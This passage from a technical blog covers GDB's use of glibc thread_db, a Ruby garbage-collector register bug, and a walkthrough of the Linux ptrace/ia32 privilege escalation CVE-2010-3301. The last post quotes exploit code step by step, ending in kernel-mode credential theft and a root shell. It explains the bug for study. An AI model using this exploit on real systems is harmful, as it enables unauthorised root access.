                                    TD_THR_LOWEST_PRIORITY,
                                    TD_SIGNO_MASK,
                                    TD_THR_ANY_USER_FLAGS);
    }
  /* ... */

That’s pretty straightforward, but there are some hairy race conditions, as we can see in this code snippet from thread_db_find_new_threads_2 which calls find_new_threads_once:

if (until_no_new)
  {
    /* Require 4 successive iterations which do not find any new threads.
       The 4 is a heuristic: there is an inherent race here, and I have
       seen that 2 iterations in a row are not always sufficient to
       "capture" all threads.  */
    for (i = 0, loop = 0; loop < 4; ++i, ++loop)
      if (find_new_threads_once (info, i, NULL) != 0)
        /* Found some new threads.  Restart the loop from beginning.  */
        loop = -1;
  }

It's fiiiiiiiiiinnnneeee.

Now, on to the more interesting interface that is, IMHO, much less straightforward.

Notification of thread create and destroy

A debugger can also gather thread create and destroy events through an interesting asynchronous interface. Let's go step by step and see how a debugger can listen for create and destroy events.

Enable event notification

First, process wide event notification has to be enabled. This API looks very much like some pieces of the signal API. First we have to create a set of events we care about (from GDB [4]):

static void
enable_thread_event_reporting (void)
{
  td_thr_events_t events;
  td_err_e err;

  /* ... */

  /* Set the process wide mask saying which events we're interested in.  */
  td_event_emptyset (&events);
  td_event_addset (&events, TD_CREATE);

  /* ... */

  td_event_addset (&events, TD_DEATH);
  
  /* NB: the following is just a pointer to the function td_ta_set_event on linux */
  err = info->td_ta_set_event_p (info->thread_agent, &events);

The above code adds TD_CREATE and TD_DEATH to the (empty) set of events that GDB wants to get notifications about. Then the event mask is handed over to glibc with a call to the function td_ta_set_event, which just happens to be stored in a function pointer named td_ta_set_event_p in GDB.
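The event set helpers are plain macros in glibc's thread_db.h, so you can experiment with them without loading libthread_db at all. This sketch assumes that header is installed; select_lifecycle_events and event_selected are made-up wrapper names, and td_eventismember is the membership test macro from the same header.

```c
#include <assert.h>
#include <thread_db.h>

/* Build the same event set as the GDB snippet above:
 * start empty, then add thread creation and thread death. */
void select_lifecycle_events(td_thr_events_t *events)
{
    assert(events != NULL);
    td_event_emptyset(events);
    td_event_addset(events, TD_CREATE);
    td_event_addset(events, TD_DEATH);
}

/* Returns 1 if event is part of the set, 0 otherwise. */
int event_selected(const td_thr_events_t *events, td_event_e event)
{
    return td_eventismember(events, event) != 0;
}
```

Much like sigemptyset and sigaddset, the set is just a small bitmask; nothing reaches the target process until the set is passed to td_ta_set_event.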

Set asynchronous notification breakpoints

The next step is interesting.

The debugger must use an API to get the addresses of functions that will be called whenever a thread is created or destroyed. The debugger will then set a software breakpoint at those addresses. When the program creates a thread or a thread is killed, the breakpoint will be triggered and the debugger can walk the thread list and update its internal state that describes the threads in the process.

This API is td_ta_event_addr. Let's check out how GDB uses this API. This code is from the same function as above, but happens after the code shown above:

static void
enable_thread_event_reporting (void)
{

	/* ... code above here ... */

	/* Delete previous thread event breakpoints, if any.  */
	remove_thread_event_breakpoints ();
	info->td_create_bp_addr = 0;
	info->td_death_bp_addr = 0;
	
	/* Set up the thread creation event.  */
	err = enable_thread_event (TD_CREATE, &info->td_create_bp_addr);
	
	/* ... */

	/* Set up the thread death event.  */
	err = enable_thread_event (TD_DEATH, &info->td_death_bp_addr);

GDB's helper function enable_thread_event is pretty straightforward:

static td_err_e
enable_thread_event (int event, CORE_ADDR *bp)
{
  td_notify_t notify;
  td_err_e err;
  struct thread_db_info *info;

  info = get_thread_db_info (GET_PID (inferior_ptid));

  /* Access an lwp we know is stopped.  */
  info->proc_handle.ptid = inferior_ptid;

  /* Get the breakpoint address for thread EVENT.  */
  err = info->td_ta_event_addr_p (info->thread_agent, event, &notify);
  /* ... */

  /* Set up the breakpoint.  */
  gdb_assert (exec_bfd);
  (*bp) = (gdbarch_convert_from_func_ptr_addr
		  (target_gdbarch,
		   /* Do proper sign extension for the target.  */
		   (bfd_get_sign_extend_vma (exec_bfd) > 0
		    ? (CORE_ADDR) (intptr_t) notify.u.bptaddr
		    : (CORE_ADDR) (uintptr_t) notify.u.bptaddr),
		   &current_target));

  create_thread_event_breakpoint (target_gdbarch, *bp);

  return TD_OK;
}

So, GDB stores the addresses of the functions that get called on TD_CREATE and TD_DEATH in td_create_bp_addr and td_death_bp_addr, respectively, and sets breakpoints on these addresses in enable_thread_event.

Check if the event has been triggered and drain the event queue

The next time a thread is stopped because a breakpoint has been hit, the debugger needs to check if the breakpoint occurred on an address that is associated with the registered events. If so, the thread event queue needs to be drained with a call to td_ta_event_getmsg and the thread's information can be retrieved with a call to td_thr_get_info.

GDB does all this in a function called check_event:

/* Check if PID is currently stopped at the location of a thread event
   breakpoint location.  If it is, read the event message and act upon
   the event.  */

static void
check_event (ptid_t ptid)
{
  /* ... */
  td_event_msg_t msg;
  td_thrinfo_t ti;
  td_err_e err;
  CORE_ADDR stop_pc;
  int loop = 0;
  struct thread_db_info *info;

  info = get_thread_db_info (GET_PID (ptid));

  /* Bail out early if we're not at a thread event breakpoint.  */
  stop_pc =  /* ... */
  if (stop_pc != info->td_create_bp_addr
      && stop_pc != info->td_death_bp_addr)
    return;

  /* Access an lwp we know is stopped.  */
  info->proc_handle.ptid = ptid;

  /* ... */

  /* If we are at a create breakpoint, we do not know what new lwp
     was created and cannot specifically locate the event message for it.
     We have to call td_ta_event_getmsg() to get
     the latest message.  Since we have no way of correlating whether
     the event message we get back corresponds to our breakpoint, we must
     loop and read all event messages, processing them appropriately.
     This guarantees we will process the correct message before continuing
     from the breakpoint.

     Currently, death events are not enabled.  If they are enabled,
     the death event can use the td_thr_event_getmsg() interface to
     get the message specifically for that lwp and avoid looping
     below.  */

  loop = 1;

  do
    {
      err = info->td_ta_event_getmsg_p (info->thread_agent, &msg);
	  /* ... */
	
      err = info->td_thr_get_info_p (msg.th_p, &ti);
	  /* ... */

      ptid = ptid_build (GET_PID (ptid), ti.ti_lid, 0);

      switch (msg.event)
		{
		case TD_CREATE:
		  /* Call attach_thread whether or not we already know about a
		     thread with this thread ID.  */
		  attach_thread (ptid, msg.th_p, &ti);
		
		  break;
		
		case TD_DEATH:
		
		  if (!in_thread_list (ptid))
		    error (_("Spurious thread death event."));
		
		  detach_thread (ptid);
		
		  break;
		
		default:
		  error (_("Spurious thread event."));
		}
    }
  while (loop);
}

And that is how GDB finds out about existing threads and gets notified about new threads being created or existing threads dying. This asynchronous breakpoint interface is very similar to the interface exposed by libdl that I described briefly toward the end of a blog post I wrote a while ago.
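The drain loop in check_event can be modeled with a toy queue. This is a sketch under assumptions, not the thread_db interface: the sketch_ types and functions are hypothetical, and sketch_getmsg simply reports when nothing is left, which is the condition the elided parts of the GDB code use to stop looping.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical event kinds and queue; not the thread_db types. */
enum sketch_event { SKETCH_CREATE, SKETCH_DEATH };

struct sketch_queue {
    const enum sketch_event *msgs;  /* pending messages, oldest first */
    size_t count;                   /* total number of messages */
    size_t next;                    /* index of the next unread message */
};

/* Plays the role of td_ta_event_getmsg: returns 1 and stores a message,
   or returns 0 when the queue is empty. */
int sketch_getmsg(struct sketch_queue *q, enum sketch_event *out)
{
    assert(q != NULL && out != NULL);
    if (q->next == q->count)
        return 0;
    *out = q->msgs[q->next++];
    return 1;
}

/* Drain every pending message, adjusting a live-thread counter. The
   debugger cannot tell which message belongs to the breakpoint it just
   hit, so it processes all of them. */
int sketch_drain(struct sketch_queue *q, int live_threads)
{
    enum sketch_event ev;

    while (sketch_getmsg(q, &ev)) {
        if (ev == SKETCH_CREATE)
            live_threads++;
        else
            live_threads--;
    }
    return live_threads;
}
```

Calling sketch_drain a second time on the same queue changes nothing, which is why it is safe to drain on every thread event breakpoint.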

Notifications for other interesting events

The API supports other interesting events that are not currently implemented in glibc. A motivated programmer could build a shim which implements these events. Doing so would allow you to build some very interesting visualization applications for lock contention and scheduling:

/* Events reportable by the thread implementation.  */
typedef enum
{
  TD_ALL_EVENTS,			/* Pseudo-event number.  */
  TD_EVENT_NONE = TD_ALL_EVENTS, 	/* Depends on context.  */
  TD_READY,				/* Is executable now. */
  TD_SLEEP,				/* Blocked in a synchronization obj.  */
  TD_SWITCHTO,				/* Now assigned to a process.  */
  TD_SWITCHFROM,			/* Not anymore assigned to a process.  */
  TD_LOCK_TRY,				/* Trying to get an unavailable lock.  */
  TD_CATCHSIG,				/* Signal posted to the thread.  */
  TD_IDLE,				/* Process getting idle.  */
  TD_CREATE,				/* New thread created.  */
  TD_DEATH,				/* Thread terminated.  */
  TD_PREEMPT,				/* Preempted.  */
  TD_PRI_INHERIT,			/* Inherited elevated priority.  */
  TD_REAP,				/* Reaped.  */
  TD_CONCURRENCY,			/* Number of processes changing.  */
  TD_TIMEOUT,				/* Conditional variable wait timed out.  */
  TD_MIN_EVENT_NUM = TD_READY,
  TD_MAX_EVENT_NUM = TD_TIMEOUT,
  TD_EVENTS_ENABLE = 31		/* Event reporting enabled.  */
} td_event_e;

Take my shovel and flashlight and go look around

Check the reference section below, which has links to some of the source files mentioned above. Also, be sure to check out the header file:

/usr/include/thread_db.h

That header lists the exported functions from glibc as well as the various flags and types necessary for interacting with this interface.

Conclusion

  • Debuggers have really interesting ways of interacting with lower level system libraries.
  • Comments found tucked away in these pits of despair are pretty amazing.
  • Don't be scared. Grab a shovel and see what other interesting things you can dig up in glibc or elsewhere.

References

  1. Intel 64 Architecture Developers Manual Volume 3A 6-31
  2. glibc/nptl_db/td_ta_thr_iter.c
  3. gdb/linux-thread-db.c
  4. gdb/linux-thread-db.c

Written by Joe Damato

July 2nd, 2012 at 7:30 am

The Broken Promises of MRI/REE/YARV

tl;dr

This post is going to explain a serious design flaw of the object system used in MRI/REE/YARV. This flaw causes seemingly random segfaults and other hard to track corruption. One popular incarnation of this bug is the “rake aborted! not in gzip format.”

theme song

This blog post was inspired by one of my favorite Papoose verses. If you don’t listen to this while reading, you probably won’t understand what I’m talking about: get in the zone.

rake aborted! not in gzip format
[BUG] Segmentation fault

If you’ve seen either of these error messages you are hitting a fundamental flaw of the object model in MRI/YARV. An example of a fix for a single instance of this bug can be seen in this patch. Let’s examine this specific patch so that we can gain some understanding of the general case.

FACT: What you are about to read is absolutely not a compiler bug.

A small, but important piece of background information

The amd64 ABI1 states that some registers are caller saved, while others are callee saved. In particular, the register rax is caller saved. The callee will overwrite the value in this register to store its return value for the caller so if the caller cares about what is stored in this register, it must be copied prior to a function call.

stare into the abyss part 1

Let’s look at the C code for gzfile_read_raw_ensure WITHOUT the fix from above:

#define zstream_append_input2(z,v)\
    zstream_append_input((z), (Bytef*)RSTRING_PTR(v), RSTRING_LEN(v))

static int
gzfile_read_raw_ensure(struct gzfile *gz, int size)
{
    VALUE str;

    while (NIL_P(gz->z.input) || RSTRING_LEN(gz->z.input) < size) {
	str = gzfile_read_raw(gz);
	if (NIL_P(str)) return Qfalse;
	zstream_append_input2(&gz->z, str);
    }
    return Qtrue;
}

It looks relatively sane at first glance, but to understand this bug we’ll need to examine the assembly generated for this thing. I’m going to rearrange the assembly a bit to make it easier to follow and add a few comments along the way.

First, the code begins by setting the stage:

  push   %rbp
  movslq %esi,%rbp    # sign extend "size" into rbp
  push   %rbx
  mov    %rdi,%rbx    # rbx = gz
  sub    $0x8,%rsp    # make room on the stack for "str"

The above is pretty basic. It is your typical amd64 prologue. After things are all set up, it is time to enter the while loop in the C code above:

  jmp    1180  # JUMP IN to the loop

Next comes the NIL_P(gz->z.input) portion of the while-loop condition:

  mov    0x18(%rbx),%rax    # rax = gz->z.input
  cmp    $0x4,%rax          # in Ruby, nil is represented as 4.
  je     1190 [gzfile_read_raw_ensure+0x30]  # if gz->z.input is nil, enter the loop

Now the RSTRING_LEN(gz->z.input) < size portion:

  cmp    %rbp,0x10(%rax)        # compare size and gz->z.input->len
  jge    11b0 [gzfile_read_raw_ensure+0x50]  # jump out of loop
                                             # if  gz->z.input->len is >= size

Next comes the call to gzfile_read_raw and the NIL_P(str) check. If str is nil, the code just falls through and exits the loop:

 mov    %rbx,%rdi            # rdi = gz, rdi holds the first argument to a function.
 callq  1090 [gzfile_read_raw]  # call gzfile_read_raw
 cmp    $0x4,%rax   # compare return value (%rax) to nil
 jne    1170 [gzfile_read_raw_ensure+0x10] # if it is NOT nil jump to the good stuff

The return value of gzfile_read_raw (an address of a ruby object) is stored in rax.

And finally, the good stuff. The call to zstream_append_input:

  mov    0x10(%rax),%rdx # RSTRING_LEN(v) as 3rd arg
  mov    0x18(%rax),%rsi # RSTRING_PTR(v) as 2nd arg
  mov    %rbx,%rdi       # set gz->z as the 1st arg
  callq  10e0 [zstream_append_input]  # let it rip

Note that the arguments to zstream_append_input are moved into registers by offsetting from rax, and that when the call to zstream_append_input occurs, the ruby object returned from gzfile_read_raw is still stored only in rax. It is not written to its slot on the stack because the extra write is unnecessary.

stare into the abyss part 2

Alright, so the patch changes the zstream_append_input2 macro to this:

#define zstream_append_input2(z,v)\
    RB_GC_GUARD(v),\
    zstream_append_input((z), (Bytef*)RSTRING_PTR(v), RSTRING_LEN(v))

And, RB_GC_GUARD is defined as:

#define RB_GC_GUARD_PTR(ptr) \
    __extension__ ({volatile VALUE *rb_gc_guarded_ptr = (ptr); rb_gc_guarded_ptr;})

#define RB_GC_GUARD(v) (*RB_GC_GUARD_PTR(&(v)))

That code is just a hack to mark the memory location holding v with the volatile type qualifier. This tells the compiler that the memory backing v acts in ways that the compiler is too stupid to understand, so the compiler must ensure that reads and writes to this location are not optimized out.

A common usage of this qualifier is for memory mapped registers. Reads from memory mapped registers should not be optimized away since a hardware device may update the value stored at that location. The compiler wouldn't know when these updates could happen so it must make sure to re-read the value from this memory location when it is needed. Similarly, writes to memory mapped registers may modify the state of a hardware device and should not be optimized away.

Most of the code generated with the patch applied is the same as without except for a few slight differences before zstream_append_input is called. Let's take a look:

  mov    %rax,-0x18(%rbp)    # write str to the stack 
  mov    -0x18(%rbp),%rax    # read the value in str back to rax
  mov    0x10(%rcx),%rdx      # RSTRING_LEN(v)
  mov    0x18(%rcx),%rsi       # RSTRING_PTR(v)
  mov    %rbx,%rdi                # z
  callq  1f60 [_zstream_append_input]

The key difference is that the return value of gzfile_read_raw is written back to its memory location (which, in this case, happens to be on the stack and is called str).

the bug

The bug is triggered because:

  1. The address of the ruby object str is stored in a caller saved register, rax.
  2. The callee (zstream_append_input) does not save the value of rax (it is not required to) and rax is overwritten in the function, leaving no references to the ruby object returned by gzfile_read_raw.
  3. The callee (zstream_append_input) eventually calls rb_newobj. rb_newobj may trigger a GC run, if there are no available objects on the freelist.
  4. The GC run finds the object returned by gzfile_read_raw but sees no references to it and frees the memory associated with it.
  5. The freed object is used as if it were valid, and memory corruption occurs, causing the VM to explode.

The patch prevents this bug from happening because:

  1. The address of the ruby object str is stored in a caller saved register, rax.
  2. The volatile type qualifier causes the compiler to generate code which writes the return value back into its memory location on the stack.
  3. The callee (zstream_append_input) eventually calls rb_newobj. rb_newobj may trigger a GC run, if there are no available objects on the freelist.
  4. The GC run finds the object returned by gzfile_read_raw and finds a reference to it and therefore does not free it.
  5. Everyone is happy.
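The two lists above can be boiled down to a toy model. This is a sketch, not Ruby's collector: it assumes a GC whose only roots are the stack slots it is handed, and the sketch_ names are hypothetical. A reference that lived only in a clobbered register is simply not in the array.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical toy heap: each object is either live or freed. */
struct sketch_obj {
    int freed;
};

/* Toy collector: an object survives only if its address appears in one of
   the scanned stack slots. A value held only in a register that has since
   been overwritten is invisible to this scan. */
void sketch_gc(struct sketch_obj *heap, size_t nobjs,
               const uintptr_t *stack, size_t nslots)
{
    assert(heap != NULL);
    for (size_t i = 0; i < nobjs; i++) {
        int referenced = 0;

        for (size_t s = 0; s < nslots; s++) {
            if (stack[s] == (uintptr_t)&heap[i])
                referenced = 1;
        }
        if (!referenced)
            heap[i].freed = 1;
    }
}
```

Writing the object's address into a stack slot before the call, which is what the volatile write forces, is the difference between the object being found and being freed.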

The general case

Given valid C code, gcc will generate machine instructions that correctly do what you want. Of course, there are bugs in gcc just like any other piece of software. The problem in this case is not gcc. The problem is that the object and garbage collection implementations in REE/MRI/YARV are not valid C code, so it is not possible for gcc to generate machine instructions that do the right thing. In other words, Ruby's object and GC implementations are breaking their contract with gcc.

The end result is the need for shit like RB_GC_GUARD in REE/MRI/YARV and also in Ruby gems to selectively paper over valid gcc optimizations. Having an API that might cause the Ruby VM to fucking explode unless you proactively mark things with RB_GC_GUARD is not on the path of least resistance toward building a maintainable, safe, and performant system. Very few people out there know that the volatile type qualifier exists, let alone what it does. Essentially, this means that authors of Ruby gems must understand how GC works in the VM to prevent their gems from causing GC to break the universe.

That is fucking beyond stupid.

How to detect this bug class

This could be detected by building a simple static analysis tool. You won't catch 100% of cases, and you will definitely have false positives, but it is better than nothing. Something like this should work:

  1. Build a call digraph of the VM and/or the set of gems you care about.
  2. Find all paths leading to the rb_newobj sink.
  3. Find all paths which call rb_newobj, but do not save rax prior to making another function call which is also on a path to rb_newobj.
  4. The functions found are very likely to be causing corruption. A human will need to examine the found cases to weed out false positives and to fix the code.
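Steps 1 and 2 can be sketched with a tiny adjacency matrix. This is a rough sketch under assumptions: the graph is filled in by hand rather than extracted from a binary, the sketch_ names are hypothetical, and step 3 (checking whether rax was saved) needs the generated assembly and is not modeled here.

```c
#include <assert.h>
#include <string.h>

#define SKETCH_MAX_FUNCS 8

/* calls[a][b] != 0 means function a contains a call to function b. */
struct sketch_callgraph {
    int nfuncs;
    int calls[SKETCH_MAX_FUNCS][SKETCH_MAX_FUNCS];
};

/* Walk edges backwards: every caller of func can also reach the sink. */
static void sketch_visit(const struct sketch_callgraph *g, int func,
                         int *reaches)
{
    reaches[func] = 1;
    for (int caller = 0; caller < g->nfuncs; caller++) {
        if (g->calls[caller][func] && !reaches[caller])
            sketch_visit(g, caller, reaches);
    }
}

/* Fill reaches[f] with 1 for every function f that has a path to sink
   (the sink itself included), and 0 for everything else. */
void sketch_paths_to_sink(const struct sketch_callgraph *g, int sink,
                          int *reaches)
{
    assert(g != NULL && reaches != NULL);
    assert(g->nfuncs <= SKETCH_MAX_FUNCS && sink >= 0 && sink < g->nfuncs);
    memset(reaches, 0, sizeof(int) * (size_t)g->nfuncs);
    sketch_visit(g, sink, reaches);
}
```

With function 3 standing in for rb_newobj, every function flagged in reaches is a candidate for the manual review in step 4.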

If you have found yourself wondering "who the fuck would write such a test?", it is important for you to note that rtld in Linux does not save the SSE registers (which are supposed to be caller saved) prior to entering the fixup function. However, to ensure that such an optimization does not cause the fucking universe to come crashing down, a test ships with the code which runs objdump after building the binary. The objdump output is then grepped for any instructions which might modify the SSE registers. As long as no one touches the SSE registers, there is no need to save and restore them.

If Ruby's object and GC subsystems want to prevent the universe from exploding, they must supply an equivalent test to ensure that corruption is impossible.

Conclusion

  • MRI/YARV/REE are inherently fatally flawed.
  • I'm never writing another Ruby-related blog post.
  • I'm not a Ruby programmer.

No comments

I'm taking a page from the book of coda and disabling comments. If you got something to say, write a blog post.

References

  1. System V Application Binary Interface: AMD64 Architecture Processor Supplement

Written by Joe Damato

July 5th, 2011 at 6:00 am

detailed explanation of a recent privilege escalation bug in linux (CVE-2010-3301)

tl;dr

This article is going to explain how a recent privilege escalation exploit for the Linux kernel works. I’ll explain what the deal is from the kernel side and the exploit side.

This article is long and technical; prepare yourself.

ia32 syscall emulation

There are two ways to invoke system calls on the Intel/AMD family of processors:

  1. Software interrupt 0x80.
  2. The sysenter family of instructions.

The sysenter family of instructions is a faster syscall interface than the traditional int 0x80 interface, but isn’t available on some older 32-bit Intel CPUs.

The Linux kernel has a layer of code to allow syscalls executed via int 0x80 to work on newer kernels. When a system call is invoked with int 0x80, the kernel rearranges state to pass off execution to the desired system call, thus maintaining support for this older system call interface.

This code can be found at http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L380. We will examine this code much more closely very soon.

ptrace(2) and the ia32 syscall emulation layer

From the ptrace(2) man page (emphasis mine):

The ptrace() system call provides a means by which a parent process may observe and control the execution of another process, and examine and change its core image and registers. It is primarily used to implement break-point debugging and system call tracing.

If we examine the IA32 syscall emulation code we see some code in place to support ptrace1:

ENTRY(ia32_syscall)
/* . . . */
        GET_THREAD_INFO(%r10)
          orl $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

This code is placing a pointer to the thread control block (TCB) into the register r10 and then checking if ptrace is listening for system call notifications. If it is, a secondary code path is entered.

Let’s take a look2:

ia32_tracesys:                   
        /* . . . */
        call syscall_trace_enter
        LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call
END(ia32_syscall)

Notice the LOAD_ARGS32 macro and comment above. That macro reloads register values after the ptrace syscall notification has fired. This is really fucking important because the userland parent process listening for ptrace notifications may have modified the registers which were loaded with data to correctly invoke a desired system call. It is crucial that these register values are untouched to ensure that the system call is invoked correctly.

Also take note of the sanity check for %eax: cmpl $(IA32_NR_syscalls-1),%eax

This check is ensuring that the value in %eax is less than or equal to (number of syscalls – 1). If it is, it executes ia32_do_call.

Let’s take a look at the LOAD_ARGS32 macro3:

.macro LOAD_ARGS32 offset, _r9=0
/* . . . */
movl \offset+40(%rsp),%ecx
movl \offset+48(%rsp),%edx
movl \offset+56(%rsp),%esi
movl \offset+64(%rsp),%edi
.endm

Notice that the register %eax is left untouched by this macro, even after the ptrace parent process has had a chance to modify its contents.

Let’s take a look at ia32_do_call which actually transfers execution to the system call4:

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8) # xxx: rip relative

The system call invocation code is calling the function whose address is stored at ia32_sys_call_table + (8 * %rax). That is, the %rax-th entry in the ia32_sys_call_table, where each entry is 8 bytes wide.

subtle bug leads to sexy exploit

This bug was originally discovered by the Polish hacker “cliph” in 2007, fixed, but then reintroduced accidentally in early 2008.

The exploit is made possible by three key things:

  1. The register %eax is not touched in the LOAD_ARGS32 macro and can be set to any arbitrary value by a call to ptrace.
  2. The ia32_do_call uses %rax, not %eax, when indexing into the ia32_sys_call_table.
  3. The %eax check (cmpl $(IA32_NR_syscalls-1),%eax) in ia32_tracesys only checks %eax. Any bits in the upper 32bits of %rax will be ignored by this check.

These three stars align and allow an attacker to cause an integer overflow in ia32_do_call, causing the kernel to hand off execution to an arbitrary address.
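The mismatch between the 32-bit check and the 64-bit index is easy to model in C. This is a sketch, not kernel code: SKETCH_NR_SYSCALLS is a made-up table size and the sketch_ functions are hypothetical stand-ins for the two assembly instructions named in the comments.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical table size, chosen for illustration only. */
#define SKETCH_NR_SYSCALLS 512u

/* Models "cmpl $(IA32_NR_syscalls-1),%eax; ja ...": only the low 32 bits
   of the register take part in the comparison. */
int sketch_check_passes(uint64_t rax)
{
    uint32_t eax = (uint32_t)rax;

    return eax <= SKETCH_NR_SYSCALLS - 1;
}

/* Models "call *ia32_sys_call_table(,%rax,8)": the full 64-bit register is
   scaled by 8 to form the byte offset into the table. The call is only
   reached when the check above has passed. */
uint64_t sketch_table_offset(uint64_t rax)
{
    assert(sketch_check_passes(rax));
    return rax * 8;
}
```

A value like 0x800000101 sails through sketch_check_passes because its low half is 0x101, yet the offset computed from it lands far outside any table of 512 entries.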

Damnnnnn, that’s hot.

the exploit, step by step

The exploit code is available here and was written by Ben Hawkes and others.

The exploit begins execution by forking and executing two copies of itself:

        if ( (pid = fork()) == 0) {
                ptrace(PTRACE_TRACEME, 0, 0, 0);
                execl(argv[0], argv[0], "2", "3", "4", NULL);
                perror("exec fault");
                exit(1);
        }

The child process is set up to be traced by calling ptrace with the PTRACE_TRACEME request.

The parent process enters a loop:

        for (;;) {
                if (wait(&status) != pid)
                        continue;

                /* ... */
                
                rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                if (rax == 0x000000000101) {
                        if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
                                printf("PTRACE_POKEUSER fault\n");
                                exit(1);
                        }
                        set = 1;
                }
 
                /* ... */
 
                if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
                        printf("PTRACE_SYSCALL fault\n");
                        exit(1);
                }
         }

The parent calls wait and blocks until entry into a system call. When a system call is entered, ptrace is invoked to read the value of the rax register. If the value is 0x101, ptrace is invoked to set the value of rax to 0x800000101 to cause an overflow, as we’ll see shortly. ptrace is then invoked to resume execution in the child.

While this is happening, the child process is executing. It begins by looking up the addresses of two symbols in the kernel:

	commit_creds = (_commit_creds) get_symbol("commit_creds");
	/* ... */

	prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
       /* ... */

Next, the child process attempts to create an anonymous memory mapping using mmap:

        if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
          /* ... */            

This mapping is created at the address tmp. tmp is set earlier to: 0xffffffff80000000 + (0x0000000800000101 * 8) (stored in kern_s in main).

This value actually causes an overflow, and wraps around to: 0x3f80000808. mmap only creates mappings on page-aligned addresses, so the mapping is created at: 0x3f80000000. This mapping is 64 megabytes large (stored in size).
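If you want to check the arithmetic yourself, here is a small sketch. The base and index are the values quoted above; the 4 KiB page size and the sketch_ names are assumptions for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Base value quoted in the text above. */
#define SKETCH_TABLE_BASE UINT64_C(0xffffffff80000000)
/* Assumed 4 KiB pages. */
#define SKETCH_PAGE_SIZE  UINT64_C(4096)

/* Unsigned 64-bit arithmetic wraps modulo 2^64, which is the overflow the
   exploit relies on. */
uint64_t sketch_entry_addr(uint64_t rax)
{
    return SKETCH_TABLE_BASE + rax * 8;
}

/* Round an address down to the start of its page. */
uint64_t sketch_page_floor(uint64_t addr)
{
    assert((SKETCH_PAGE_SIZE & (SKETCH_PAGE_SIZE - 1)) == 0);
    return addr & ~(SKETCH_PAGE_SIZE - 1);
}
```

Feeding 0x800000101 to sketch_entry_addr gives 0x3f80000808, and sketch_page_floor of that is 0x3f80000000, matching the numbers above.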

Next, the child process writes the address of a function called kernelmodecode which makes use of the symbols commit_creds and prepare_kernel_cred which were looked up earlier:

int kernelmodecode(void *file, void *vma)
{
	commit_creds(prepare_kernel_cred(0));
	return -1;
}

The address of that function is written over and over to the 64 MB of memory that was mapped in:

        for (; (uint64_t) ptr < (tmp + size); ptr++)
                *ptr = (uint64_t)kernelmodecode;

Finally, the child process executes syscall number 0x101 and then executes a shell after the system call returns:

        __asm__("\n"
        "\tmovq $0x101, %rax\n"
        "\tint $0x80\n");
 
        /* . . . */
        execl("/bin/sh", "bin/sh", NULL);

tying it all together

When system call 0x101 is executed, the parent process (described above) receives a notification that a system call is being entered. The parent process then sets rax to a value which will cause an overflow: 0x800000101 and resumes execution in the child.

The child executes the erroneous check described above:

        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call

Which succeeds, because it is only comparing the lower 32bits of rax (0x101) to IA32_NR_syscalls-1.

Next, execution continues to ia32_do_call, which causes an overflow, since rax contains a very large value.

call *ia32_sys_call_table(,%rax,8)

Instead of calling the function whose address is stored in the ia32_sys_call_table, the address is pulled from the memory the child process mapped in, which contains the address of the function kernelmodecode.

kernelmodecode is part of the exploit, but the kernel has access to the entire address space and is free to begin executing code wherever it chooses. As a result, kernelmodecode executes in kernel mode setting the privilege level of the process to those of init.

The system has been rooted.

The fix

The fix is to zero the upper half of rax and change the comparison to examine the entire register. You can see the diffs of the fix here and here.

Conclusions

  • Reading exploit code is fun. Sometimes you find particularly sexy exploits like this one.
  • The IA32 syscall emulation layer is, in general, pretty wild. I would not be surprised if more bugs are discovered in this section of the kernel.
  • Code reviews play a really important part of overall security for the Linux kernel, but subtle bugs like this are very difficult to catch via code review.
  • I'm not a Ruby programmer.

References

  1. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L424
  2. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L439
  3. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L50
  4. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L430

Written by Joe Damato

September 27th, 2010 at 4:59 am